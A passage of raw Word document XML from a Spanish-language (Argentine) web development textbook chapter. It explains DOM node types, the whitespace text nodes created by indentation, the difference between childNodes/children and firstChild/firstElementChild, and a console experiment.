              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26072E69" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C8C30B5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">El texto entre etiquetas, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>incluidos los espacios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="6984DBC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4FAB1B0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Comentario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="207F4D75" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4ECB54E6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;!-- ... --&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="4229AB85"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8EFAA5F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Documento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D67D2E2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6311EFCE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">La raíz, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53A5E68E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc239319982"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Lo de los espacios no es un detalle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1E8ABC3D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ese </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>incluidos los espacios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> explica algo desconcertante:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B644428" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60977DC2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;li&gt;Milanesa&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC06367" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;li&gt;Empanadas&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B23DC9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F919EB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiene </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>cinco</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> hijos. No dos. Los dos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;li&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> que ves, más </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>tres nodos de texto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> que no ves: la indentación antes del primero, la de entre los dos y la de después. Tu prolijidad al indentar es contenido real del árbol. Por eso hay dos pares de propiedades que se parecen y no son lo mismo:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3007"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3004"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="443F4A58"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C64144E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Propiedad</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66BB632" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Devuelve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D398F68" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Incluye nodos de texto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="009137F5"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B13E956" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>childNodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55EB5A23" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Todos los hijos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="40EDDF02" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="0B89E824"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E1C5884" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>children</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="007CA7BC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Sólo elementos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="493B85D4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="4A378582"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49B6F04" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>firstChild</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19FEC04D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El primer hijo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D240743" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="094C493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F09A2D8" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>firstElementChild</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FB91169" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El primer hijo elemento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="39DDB3EC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EA18CB6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Salvo que estés manipulando texto a propósito, la versión con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la que querés:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la diferencia entre un código que anda y uno que anda a veces.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="9020" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9020"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="610AC943" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="85" w:type="dxa"/>
              <w:bottom w:w="85" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="269FF1C5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72911696" wp14:editId="431C7C84">
                  <wp:extent cx="5580000" cy="2256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4-1.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5580000" cy="2256747"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75D8001B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Epgrafe"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Figura 4.1. El árbol de nodos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48A302C4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E2F0DC" w:fill="E2F0DC"/>
          </w:tcPr>
          <w:p w14:paraId="7A88F3CE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="538135"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>EXPERIMENTO — hacelo hoy, en cualquier página</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72FE2A88" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Dos minutos, y te evita una tarde de confusión.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB2979F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Abrí cualquier página con una lista y seleccioná el </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;ul&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> en el inspector.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D6F7E1D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">2. En la consola, escribí </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>$0.childNodes.length</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y después </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>$0.children.length</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2945DFB9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Los números no coinciden. Y no es un error: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>los saltos de línea y la indentación de tu marcado son nodos de texto reales</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78A49718" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Probá ahora </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>$0.firstChild</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>$0.firstElementChild</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D455A38" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">El primero devuelve un nodo de texto con un salto de línea; el segundo, el </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;li&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> que esperabas. Por eso, cuando recorras hijos, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">usá siempre la versión con </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
